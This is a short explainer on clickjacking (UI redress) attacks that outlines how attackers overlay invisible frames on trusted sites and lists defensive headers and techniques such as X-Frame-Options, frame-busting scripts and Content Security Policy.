Clickjacking, also known as a UI (User Interface) redress attack or a UI redressing attack, is a malicious technique used by attackers to deceive users and trick them into clicking on something different from what they perceive.
In clickjacking attacks, attackers overlay or “frame” a legitimate website or web application with an invisible or transparent layer containing malicious elements. This layer can be used to capture user interactions without their knowledge, potentially leading to unintended actions or security breaches.
How Clickjacking Works
| Creation of a Malicious Page | The attacker creates a malicious web page that contains elements they want users to interact with. These elements could be buttons, forms, or links. |
| Overlaying the Target Website | The attacker uses iframes or other techniques to overlay the malicious page on top of a legitimate website or web application that the user trusts and may have a reason to interact with. |
| Making Elements Transparent or Invisible | The malicious elements on the attacker’s page are made transparent or invisible, so users cannot see them. |
| Deceptive User Interaction | When users interact with the legitimate website, they unknowingly interact with the transparent or invisible malicious elements overlaid by the attacker’s page. |
| Performing Unintended Actions | Since the user believes they are interacting with the legitimate website, they may inadvertently perform actions (e.g., clicking a button, submitting a form) on the attacker’s page without realizing it. |
Mitigating Clickjacking Attacks
To prevent clickjacking attacks, you can implement various security measures, including the use of security headers:
| X-Frame-Options Header | Using the X-Frame-Options header to control whether a page can be embedded within an iframe. Setting the header to DENY or SAMEORIGIN can help mitigate clickjacking. |
| Frame-Busting JavaScript | Including frame-busting JavaScript code in web pages to prevent their display within iframes. This code can check whether the page is the top-level document and break out of any frames if not. |
| Content Security Policy (CSP) | Implementing a Content Security Policy that restricts the sources from which a page’s resources can be loaded, including frames. |
| Referrer Policy | Using the Referrer-Policy header to control how much information about the source of a request is included in the Referer header. This can prevent clickjacking attempts that rely on obtaining the referrer information. |